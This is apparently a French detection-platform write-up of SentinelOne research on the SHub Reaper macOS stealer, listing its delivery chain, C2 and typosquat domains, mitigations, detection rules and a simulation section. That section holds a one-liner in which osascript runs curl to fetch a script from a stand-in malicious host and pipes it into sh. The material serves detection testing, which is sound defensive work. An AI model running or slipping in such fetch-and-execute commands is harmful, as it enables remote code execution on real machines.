SHub Reaper | Le voleur macOS imite Apple, Google et Microsoft dans une chaîne d’attaque unique
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Le rapport analyse une nouvelle variante de logiciel voleur d’informations pour macOS appelée SHub Reaper, qui utilise de faux installateurs WeChat et Miro pour livrer une charge utile AppleScript malveillante via un domaine Microsoft thématique mal orthographié. Une fois lancée dans Script Editor, la charge utile collecte les données du navigateur, les fichiers de portefeuille de cryptomonnaie et les informations du trousseau, puis exfiltre le contenu volé sous forme d’archives ZIP fractionnées. Le malware altère également les fichiers de portefeuille et établit une persistance via un LaunchAgent déguisé en mise à jour logicielle Google. La détection recommandée se concentre sur l’exécution d’AppleScript, la création suspecte de LaunchAgent et le trafic sortant vers l’infrastructure connue de commande et de contrôle.
Enquête
SentinelOne a suivi l’intégralité de la chaîne de livraison en plusieurs étapes, y compris l’utilisation abusive du schéma applescript:// , la génération dynamique de la charge utile AppleScript et un module de capture de fichiers qui reproduit le comportement de vol de documents vu dans AMOS. Les chercheurs ont capturé le trafic réseau vers le domaine de commande et de contrôle hebsbsbzjsjshduxbs.xyz et les points de terminaison associés, ainsi que la création de fichiers temporaires sous /tmp et un LaunchAgent placé dans le répertoire Bibliothèque de l’utilisateur. L’enquête a également révélé une fonctionnalité de bot Telegram codée en dur utilisée pour la télémétrie de l’opérateur.
Atténuation
Les défenseurs devraient bloquer l’accès aux domaines mal orthographiés mlcrosoft.co.com, qq-0732gwh22.com, et mlroweb.com, et surveiller les LaunchAgents créés sous des chemins imitant les composants de mise à jour Google. La liste d’autorisation des applications doit être utilisée pour restreindre l’exécution d’AppleScript à partir de sources non fiables, et une vérification stricte de la signature du code doit être appliquée. Les détections réseau devraient également alerter sur la communication avec le domaine de commande et de contrôle identifié et ses chemins d’API connus.
Réponse
Si une activité SHub Reaper est détectée, isolez immédiatement le point de terminaison affecté, terminez tout processus AppleScript ou LaunchAgent suspect et supprimez les fichiers malveillants de /tmp et de la Bibliothèque de l’utilisateur. Les enquêteurs doivent ensuite procéder à une collecte médico-légale complète des magasins de données du navigateur, des répertoires de portefeuille et des répertoires de crédentials, suivie de réinitialisations de crédentials là où une compromission est suspectée. L’infrastructure de commande et de contrôle identifiée doit être bloquée, et l’équipe de réponse aux incidents doit commencer une chasse aux menaces plus large à travers l’environnement.
Flux d’attaque
Détections
Communications de domaine IP peut-être consultation tentées (via dns)
Voir
Signature forcée de code de paquets d’applications modifiés (via cmdline)
Voir
Utilitaire d’archive MacOS pointant vers un répertoire suspect (via cmdline)
Voir
Tentative d’exécution suspecte de Curl [MacOS] (via cmdline)
Voir
Archive créée dans le répertoire temporaire de MacOS (via file_event)
Voir
Manipulation possible de chaînes encodées en Base64 (via cmdline)
Voir
IOC (HashSha256) pour détecter : SHub Reaper | macOS Stealer Usurpe Apple, Google et Microsoft dans une chaîne d’attaque unique
Voir
IOC (HashMd5) pour détecter : SHub Reaper | macOS Stealer Usurpe Apple, Google et Microsoft dans une chaîne d’attaque unique
Voir
Détection de la chaîne d’infection SHub Reaper utilisant des domaines mal orthographiés et C2 [Serveur Web]
Voir
Détecter l’exécution du malware SHub Reaper via AppleScript et Curl [Création de processus Linux]
Voir
Exécution de la simulation
Prérequis : Le test prévol de la télémétrie et de la base doit avoir passé.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et la narration DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un diagnostic erroné.
-
Narration de l’attaque & Commandes :
L’attaquant crée un court one-liner qui utiliseosascriptpour exécuter une commande shell. Dans l’AppleScript,do shell scriptexécutecurlpour télécharger un script shell distant (payload.sh) et le passe directement dansshpour exécution. Comme toute la chaîne est intégrée dans une seule invocation AppleScript, macOS enregistre un seulprocess_creationévénement dont la ligne de commande contient à la foisosascriptandcurl, satisfaisant ainsi la règle de détection. -
Script de test de régression :
#!/bin/bash # # Simule l'exécution de SHub Reaper sur macOS # Génère un seul événement process_creation contenant à la fois 'osascript' et 'curl' # MALICIOUS_URL="https://malicious.example.com/payload.sh" # One‑liner : osascript exécute une commande shell qui télécharge avec curl le payload et l'exécute osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh"" -
Commandes de nettoyage :
#!/bin/bash # # Nettoie tous les artefacts créés par la simulation. # Le payload s'exécute en mémoire et n'écrit pas de fichiers, mais nous nous assurons qu'il n'y a pas de processus persistants. # # Tuer tous les processus 'sh' errants démarrés par le test (à utiliser avec prudence sur les systèmes de production) pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"